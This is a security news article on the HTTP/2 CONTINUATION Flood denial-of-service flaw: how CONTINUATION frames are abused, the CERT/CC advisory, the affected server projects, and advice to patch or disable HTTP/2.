New findings have revealed a potential vulnerability within the HTTP/2 protocol, specifically concerning the CONTINUATION frame, which could be exploited for denial-of-service (DoS) attacks.
Security researcher Bartek Nowotarski dubbed this technique the HTTP/2 CONTINUATION Flood and reported it to the CERT Coordination Center (CERT/CC) on January 25, 2024. According to CERT/CC’s advisory on April 3, 2024, many HTTP/2 implementations inadequately limit or sanitize the amount of CONTINUATION frames sent within a single stream.
In essence, attackers can send a stream of CONTINUATION frames to a target server, overwhelming it with requests that may cause an out-of-memory (OOM) crash. These frames, though not appended to the header list in memory, are still processed and decoded by the server, exacerbating the risk of exploitation.
HTTP/2, like its predecessor HTTP/1, utilizes header fields within requests and responses, organized into header lists and subsequently serialized into header blocks. These blocks are then fragmented and transmitted within HEADER or CONTINUATION frames. The CONTINUATION frame, as defined in RFC 7540, continues a sequence of header block fragments, allowing for the transmission of multiple frames on the same stream.
Nowotarski highlights that the CONTINUATION Flood represents a more severe threat compared to previous vulnerabilities, such as the Rapid Reset attack disclosed in October 2023. Despite its potential impact, the malicious requests involved in this attack may not be evident in HTTP access logs, complicating detection efforts.
At its core, the vulnerability arises from mishandling of HEADERS and multiple CONTINUATION frames, leading to a DoS condition. Attackers can exploit this flaw by initiating a new HTTP/2 stream against a vulnerable server and sending a continuous stream of headers without the END_HEADERS flag set. This inundates the server, potentially causing crashes or CPU exhaustion, thus affecting availability.
Several projects, including amphp/http, Apache HTTP Server, Apache Tomcat, Apache Traffic Server, Envoy proxy, Golang, h2 Rust crate, nghttp2, Node.js, and Tempesta FW, are affected by this vulnerability. Users are urged to update their software to the latest versions or temporarily disable HTTP/2 where patches are unavailable to mitigate potential threats.